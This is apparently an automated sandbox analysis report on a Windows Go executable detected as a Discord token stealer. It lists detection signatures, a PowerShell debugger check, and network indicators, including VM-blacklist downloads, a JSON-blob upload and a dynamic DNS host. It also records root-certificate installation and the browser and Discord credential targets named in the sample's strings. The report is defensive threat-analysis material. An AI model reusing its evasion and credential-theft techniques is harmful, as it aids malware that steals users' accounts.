Edit tour

Windows Analysis Report
CFuejz2dRu.exe

Overview

General Information

Sample name:	CFuejz2dRu.exe renamed because original name is a hash value
Original sample name:	5f343fef68caa4a9bfd673cd071b7f6dbac55995433735e35af63e018cabae3f.exe
Analysis ID:	1548554
MD5:	020b08da71b11949586b7a6185877b13
SHA1:	518117166ae0bab4b79d483e8de9c11e6b38ff50
SHA256:	5f343fef68caa4a9bfd673cd071b7f6dbac55995433735e35af63e018cabae3f
Tags:	exeuser-adrian__luca
Infos:

Detection

Discord Token Stealer

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Discord Token Stealer

AI detected suspicious sample

Found Tor onion address

Installs new ROOT certificates

Tries to harvest and steal browser information (history, passwords, etc)

Uses dynamic DNS services

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

System is w10x64

CFuejz2dRu.exe (PID: 5460 cmdline: "C:\Users\user\Desktop\CFuejz2dRu.exe" MD5: 020B08DA71B11949586B7A6185877B13)

conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2768 cmdline: powershell -command [Diagnostics.Debugger]::IsAttached MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1591335139.000000C000016000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
Process Memory Space: CFuejz2dRu.exe PID: 5460	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security

Sigma Signatures

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [Diagnostics.Debugger]::IsAttached, CommandLine: powershell -command [Diagnostics.Debugger]::IsAttached, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CFuejz2dRu.exe", ParentImage: C:\Users\user\Desktop\CFuejz2dRu.exe, ParentProcessId: 5460, ParentProcessName: CFuejz2dRu.exe, ProcessCommandLine: powershell -command [Diagnostics.Debugger]::IsAttached, ProcessId: 2768, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T16:24:57.739368+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.8	62044	TCP
2024-11-04T16:25:35.948910+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.8	62049	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: CFuejz2dRu.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.7% probability

Source: CFuejz2dRu.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Found Tor onion address

Source: CFuejz2dRu.exe, 00000000.00000000.1466821747.0000000000E82000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: m=nil base numberstringStringFormat[]byteCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiX25519%w%.0wuint16uint32uint64structchan<-<-chan ValueSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondServernetdnsdomaingophertelnetreturn.locallisten.onionip+netsocket390625GetACPhangupkilledrdtscppopcntcmd/go FROM GetAcesendtoempty rune1 secretheaderAnswerLengthSTREETavx512rdrandrdseedAPPDATADiscordOrbitumSputnikVivaldiChrome1Chrome2Chrome3Chrome4Chrome5Iridium.configdiscordFlatPakfirefoxFirefoxstorageleveldbTriggerUpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTreaddirconsolePATHEXTforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
Source: CFuejz2dRu.exe	String found in binary or memory: m=nil base numberstringStringFormat[]byteCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiX25519%w%.0wuint16uint32uint64structchan<-<-chan ValueSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondServernetdnsdomaingophertelnetreturn.locallisten.onionip+netsocket390625GetACPhangupkilledrdtscppopcntcmd/go FROM GetAcesendtoempty rune1 secretheaderAnswerLengthSTREETavx512rdrandrdseedAPPDATADiscordOrbitumSputnikVivaldiChrome1Chrome2Chrome3Chrome4Chrome5Iridium.configdiscordFlatPakfirefoxFirefoxstorageleveldbTriggerUpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTreaddirconsolePATHEXTforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil

Uses dynamic DNS services

Source: unknown

DNS query: name: goatherd.ddns.net

Source: Joe Sandbox View	IP Address: 162.159.137.232 162.159.137.232
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:62044
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:62049

Source: unknown	TCP traffic detected without corresponding DNS query: 86.237.153.121
Source: unknown	TCP traffic detected without corresponding DNS query: 86.237.153.121
Source: unknown	TCP traffic detected without corresponding DNS query: 86.237.153.121
Source: unknown	TCP traffic detected without corresponding DNS query: 86.237.153.121
Source: unknown	TCP traffic detected without corresponding DNS query: 86.237.153.121
Source: unknown	TCP traffic detected without corresponding DNS query: 86.237.153.121
Source: unknown	TCP traffic detected without corresponding DNS query: 86.237.153.121
Source: unknown	TCP traffic detected without corresponding DNS query: 86.237.153.121
Source: unknown	TCP traffic detected without corresponding DNS query: 86.237.153.121
Source: unknown	TCP traffic detected without corresponding DNS query: 86.237.153.121
Source: unknown	TCP traffic detected without corresponding DNS query: 86.237.153.121
Source: unknown	TCP traffic detected without corresponding DNS query: 86.237.153.121
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/mac_list.txt HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: jsonblob.com
Source: global traffic	DNS traffic detected: DNS query: discord.com
Source: global traffic	DNS traffic detected: DNS query: goatherd.ddns.net

Source: unknown

HTTP traffic detected: POST /api/jsonBlob HTTP/1.1Host: jsonblob.comUser-Agent: Go-http-client/1.1Content-Length: 4135Accept: application/jsonContent-Type: application/jsonAccept-Encoding: gzip

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Mon, 04 Nov 2024 15:24:48 GMTContent-Type: text/htmlContent-Length: 151Connection: closeCF-RAY: 8dd59cf1cf69e82f-DFW
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Mon, 04 Nov 2024 15:24:49 GMTContent-Type: text/htmlContent-Length: 151Connection: closeCF-RAY: 8dd59cf82b112c9c-DFW

Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/gsr1.crl
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/gsr1.crl0
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/r4.crl
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026A000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/r4.crl0
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/we1/fJedmL2peto.crl
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C000262000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/we1/fJedmL2peto.crl0
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/gsr1.crt
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/gsr1.crt0-
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crl
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crlCertCreateCertificateContextCertFreeCertificat
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026A000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/r4.crt0
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/r4.crtGlobalSign
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/we1.crt
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C000262000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/we1.crt0
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://o.pki.goog/s/we1/Rk8
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C000262000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://o.pki.goog/s/we1/Rk80%
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://o.pki.goog/s/we1/Rk8http://i.pki.goog/we1.crt
Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C0000E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://jsonblob.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: classification engine

Classification label: mal76.troj.spyw.evad.winEXE@4/3@5/5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1992:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3hkxvbv.cjm.ps1

Jump to behavior

Source: CFuejz2dRu.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CFuejz2dRu.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM Win32_Processor

Source: C:\Users\user\Desktop\CFuejz2dRu.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CFuejz2dRu.exe

ReversingLabs: Detection: 36%

Source: CFuejz2dRu.exe	String found in binary or memory: failed to construct HKDF label: %sreflect: Field of non-struct type reflect: Field index out of boundsreflect: string index out of rangereflect.Value.Grow: slice overflow: day-of-year does not match month3552713678800500929355621337890625too many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: CM_Get_Device_Interface_List_SizeWinvalid nested repetition operatorinvalid or unsupported Perl syntaxcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizecrypto/md5: invalid hash state sizehttp: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharereflect.MakeSlice of non-slice type1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9mime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlinecan't get IEnumVARIANT, enum is nilSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthtoo many Questions to pack (>65535)flate: corrupt input before offset '_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodslfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser
Source: CFuejz2dRu.exe	String found in binary or memory: failed to construct HKDF label: %sreflect: Field of non-struct type reflect: Field index out of boundsreflect: string index out of rangereflect.Value.Grow: slice overflow: day-of-year does not match month3552713678800500929355621337890625too many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: CM_Get_Device_Interface_List_SizeWinvalid nested repetition operatorinvalid or unsupported Perl syntaxcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizecrypto/md5: invalid hash state sizehttp: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharereflect.MakeSlice of non-slice type1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9mime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlinecan't get IEnumVARIANT, enum is nilSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthtoo many Questions to pack (>65535)flate: corrupt input before offset '_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodslfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser
Source: CFuejz2dRu.exe	String found in binary or memory: /usr/lib/go/src/net/addrselect.go

Source: unknown	Process created: C:\Users\user\Desktop\CFuejz2dRu.exe "C:\Users\user\Desktop\CFuejz2dRu.exe"
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [Diagnostics.Debugger]::IsAttached
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [Diagnostics.Debugger]::IsAttached	Jump to behavior

Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\CFuejz2dRu.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: CFuejz2dRu.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: CFuejz2dRu.exe

Static file information: File size 6226432 > 1048576

Source: CFuejz2dRu.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c0e00
Source: CFuejz2dRu.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2c4e00

Source: CFuejz2dRu.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: CFuejz2dRu.exe	Static PE information: section name: .xdata
Source: CFuejz2dRu.exe	Static PE information: section name: .symtab

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Source: C:\Users\user\Desktop\CFuejz2dRu.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Users\user\Desktop\CFuejz2dRu.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
